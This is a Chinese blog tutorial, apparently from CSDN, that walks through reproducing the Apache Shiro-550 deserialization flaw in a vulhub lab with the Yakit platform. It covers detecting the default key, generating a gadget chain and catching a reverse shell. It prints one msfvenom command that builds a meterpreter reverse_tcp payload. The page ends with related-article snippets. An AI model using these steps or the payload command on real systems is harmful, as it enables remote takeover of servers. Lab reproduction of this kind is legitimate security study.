yakit shiro-550 返连shell命令执行

原创 于 2025-04-10 08:00:00 发布 · 645 阅读 · 10 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#web安全 #安全性测试

前言

今天以vulhub的shiro的案例,介绍一下yakit的反向连接功能。

环境准备

  • ubutnu22
  • docker
  • vulhub https://github.com/vulhub/vulhub/tree/master/shiro/CVE-2016-4437

IP
ubuntu 192.168.56.31
yakit所在主机 192.168.56.1

shiro 探测

MITM 开启 shiro自定义检测
testpng

勾选rememberme,输入随便什么账号密码,抓包
testpng

在yakit菜单栏的“bug”上,能看到已经检测到shiro默认key。
testpng

查看详情
testpng

接下来,让我们通过yakit内置的利用链,反弹shell。

反向连接

代码生成器本文没用到,但我觉得还是介绍一下。它相当于将常见的反弹shell命令集成到一块。真不愧是个综合平台。

代码生成器

生成反向连接的代码
testpng

MSF版本
testpng

结果:

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=0.0.0.0 LPORT=8085 -f elf -o reverse.elf

开启端口监听

testpng

监听中……
testpng

我们选择下图标记1的Yso-Java-hack,生成利用链,添加反向连接的IP和端口
testpng

代码发送到yak runner模块,因为yakit默认的利用代码就是shiro。所以我们不需要做太多的更改,只要取消注释,添加目标URL参数。
testpng

目标URL,点击右上角的执行
testpng

此时,查看监听器,可以看到有来自192.168.56.32反向连接
testpng

注意:如果你此时无法在终端输入信息,把右上角的原始模式关掉

testpng

此时,就可以直接使用了
testpng

Yakit: 集成化单兵安全能力平台使用教程·连管理篇
大河之犬的博客
06-07 1703
序列化、类加载、JNDI漏洞利用是Java漏洞中特别常见的几种类型,但相对来说利用过程又是较为复杂的。Shell 的接收工具,利用端口监听器可以在服务器上开启一个端口,进行监听,并进行交互。关闭公网穿透服务则在本地启动连服务器,可以用于本地靶场测试或内网平台的漏洞检测。所以Yakit提供了两个特别好用的功能一个是前文提到的连服务器,一个是。Yakit连服务器使用协议端口复用技术,同时在一个端口同时实现。还可以展示生成payload的代码,还可以将代码发送到。
Yakit:不用 Token 也能执行的连检测技术!
YakProject的博客
11-01 2492
在传统的连/出网技术检测中,不管是 dnslog 还是 RMI / LDAP Fake 服务器,或者是最基础的 HTTP 服务器,如果需要自动化监测并报告漏洞,需要把 Token 与发出的 Payload 检测漏洞需要对应。同时,在YAK 中实现了一套 cybertunnel 的机制,使用 grpc 构建了一套端口穿透的技术,可以映射一个本地 tcp / udp 协议端口到远端。当我用搜索引擎,如谷歌和百度搜索“连平台”四个字时,首页几乎所有的内容都是xray的连平台。
新功能史上最好用的连&JavaHack,安全能力基座强化ing
白帽黑客八哥的博客
06-21 1800
有些Java漏洞的利用太繁琐了,需要java环境、多种工具配合使用、还要在虚拟服务器上看回显、记各种命令…对比之下 Yakit 真的太好用了。本次更新的两个功能基本上可以解决大部分Java漏洞利用的场景,希望师傅们多多使用,欢迎提出意见。
Shiro-550序列化漏洞复现及漏洞利用复现总结
weixin_44283446的博客
04-14 1721
Weblogic序列漏洞总结前言什么是序列化?什么是序列化?环境搭建环境说明搭建过程 前言 最近参与2021护网,有很多东西都需要补充学习,本文根据一些视频教程和网页博客总结而来,很多网站都存在这序列化漏洞,学习一下作为知识储备,通过写这篇blog也帮助我理清思路。 什么是序列化?     面向对象语言在存储对象的时候有一个很难存储的问题,就考虑将对象转换成字符串进行持久化存储,可以方便网络传输。即一个对象序列化,转化成字符串,然后传输给别人,再序列化回
第8天:基础入门-数据不回显&数据不出网&出入站策略&正向连接&Shell&外带延迟写入
wusaicyq的博客
11-28 824
DNS等隧道技术,例:若受害者出站策略只配置了ICMP协议,那么受害者就无法把cmd给到攻击者的监听端口如666端口(即无法实现向代理),这个时候就要用到隧道技术;理解:外带就是受害者主动去访问——>攻击者做了配置的东西(如域名)——>在攻击者的后 台会留下记录,说明命令执行了。再访问文件,如果访问的到,说明写入文件的命令被执行,存在漏洞;首先判断是不是数据不回显,并且有命令可执行漏洞,如果有,则可以尝试shell,⑤其他:根据环境,判断是否有命令可执行漏洞。③延迟判断,判断是否有命令可执行漏洞。
#渗透测试#红蓝对抗#Src漏洞挖掘 介绍-Yakit(2)
soc的博客
10-26 1066
这些信息通常由你的网络管理员提供,或者你可以从你的网络设置中获取。在Yakit的设置中,确认你选择了正确的连模式(本地或公网),并且所有相关的配置都是正确的。在使用Yakit进行全局配置时,如果遇到“empty addr”的错误提示,这通常意味着在配置过程中没有正确设置连地址。在Yakit的日志中查找更多的错误信息,这些信息可能会帮助你诊断问题的根本原因。通常,你可以在软件的主界面上找到一个齿轮状的图标,点击它就可以进入设置2。在配置代理时,确保你的网络连接是稳定的,并且你的网络环境允许外部连接。
shiro-jar.zip
12-12
shiro-all-1.7.1.jar,shiro-aspectj-1.7.1.jar,shiro-cache-1.7.1.jar,shiro-config-core-1.7.1.jar,shiro-config-ogdl-1.7.1.jar,shiro-core-1.7.1.jar,shiro-crypto-cipher-1.7.1.jar,shiro-crypto-core-1.7.1.jar...
shiro-core-1.4.0-API文档-中文版.zip
07-12
赠送jar包:shiro-core-1.4.0.jar; 赠送原API文档:shiro-core-1.4.0-javadoc.jar; 赠送源代码:shiro-core-1.4.0-sources.jar; 赠送Maven依赖信息文件:shiro-core-1.4.0.pom; 包含翻译后的API文档:shiro-core...
shiroshiro-all-1.8.0.jar)
03-21
shiroshiro-all-1.8.0.jar)
shiro-core-1.7.1 jar
07-12
shiro shiro-core-1.7.1 jar shiro漏洞
shiro-core 低版本漏洞检测
01-31
shiro-core 低版本漏洞检测工具
通过Yakit单兵作战工具进行log4j2 RCE漏洞复现(CVE-2021-44228)
m0_72037303的博客
08-04 2246
在家庭局域网的另一条Ubuntu24笔记本中,使用vulhub靶场搭建,首先下载,解压并进入目录/vulhub/log4j/CVE-2021-44228中,执行docker启动命令宝塔查看靶场信息接下来我们直接访问靶机ip的8993端口即可看到靶场。
【网络安全---漏洞复现】shiro550序列化漏洞原理与漏洞复现和利用(基于vulhub,保姆级的详细教程)
m0_67844671的博客
09-21 6702
shiro550序列化漏洞原理与漏洞复现和利用(基于vulhub,保姆级的详细教程);Apache Shiro是一个强大且易用的Java安全框架,执行身份验证、授权、密码和会话管理。使用Shiro的易于理解的API,您可以快速、轻松地获得任何应用程序,从最小的移动应用程序到最大的网络和企业应用程序;
网络安全入门笔记(共327页),助你步入安全门槛
Spontaneous_0的博客
01-31 1283
网络安全入门笔记(共327页),助你步入安全门槛
【集成化单兵渗透平台】Yakit 官方版
qq_47493625的博客
12-13 421
Yakit是一个基于Yak语言开发的网络安全领域垂直语言工具,它提供了一个图形化用户界面(GUI)来操控Yak引擎的能力。Yakit旨在降低使用安全工具的门槛,使得安全从业者即使没有编程技能也能轻松地进行安全测试和分析。
无Java依赖的Shiro靶场_shiro在线靶场
wananxuexihu的博客
11-07 856
本次以 Shiro 靶场为例展开说明,其实现在内置的 4 个插件,均有对应的靶场和。
集成化单兵安全能力平台-Yakit
热门推荐
SuperherRo的博客
12-13 1万+
`Yakit` 简单来讲就是一个安全平台,平台里支持很多功能模块(`渗透测试、资产搜集、漏洞检测、连管理`等) 是一款非常优秀强悍的安全测试工具
Yakit工具篇:简介和安装使用
黄乔国PHP
10-15 9920
基于安全融合的理念,Yaklang.io 团队研发出了安全领域垂直语言Yaklang,对于一些无法原生集成在Yak平台中的产品/工具,利用Yaklang可以重新编写他们的“高质量替代”。对于一些生态完整且认可度较高的产品,Yaklang能直接编译融合,并对源码进行必要修改,更好地适配Yaklang语言。但是限于使用形式,用户想要熟练使用Yak 语言,需要学习Yak语言并同时具备对安全的一定理解。
yakit的下载安装与使用
最新发布
m0_75167824的博客
03-04 1136
十分详细,建议不要嫌麻烦,去看该文档。
shiro-550shiro-721漏洞的异同点
06-06
Shiro-550Shiro-721漏洞都是Apache Shiro框架的安全漏洞,但它们的漏洞类型和漏洞影响不同。 Shiro-550漏洞是Apache Shiro框架中的一种远程代码执行漏洞,攻击者可以通过构造恶意的序列化数据包,触发远程代码执行漏洞,从而实现对目标系统的完全控制。该漏洞可被用于在目标服务器上执行任意命令,获取敏感信息等。 Shiro-721漏洞是Apache Shiro框架中的一种权限绕过漏洞,攻击者可以通过构造特定的请求,来绕过Shiro框架的权限控制,从而访问未经授权的资源或执行未经授权的操作。该漏洞可被用于获取未经授权的访问权限,访问敏感信息等。 因此,Shiro-550Shiro-721漏洞的主要区别在于漏洞类型和漏洞影响。建议开发者及时升级Shiro框架版本或者关闭相关功能以避免此类漏洞的风险。同时,建议对请求参数进行严格的过滤和验证,避免恶意请求的输入。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值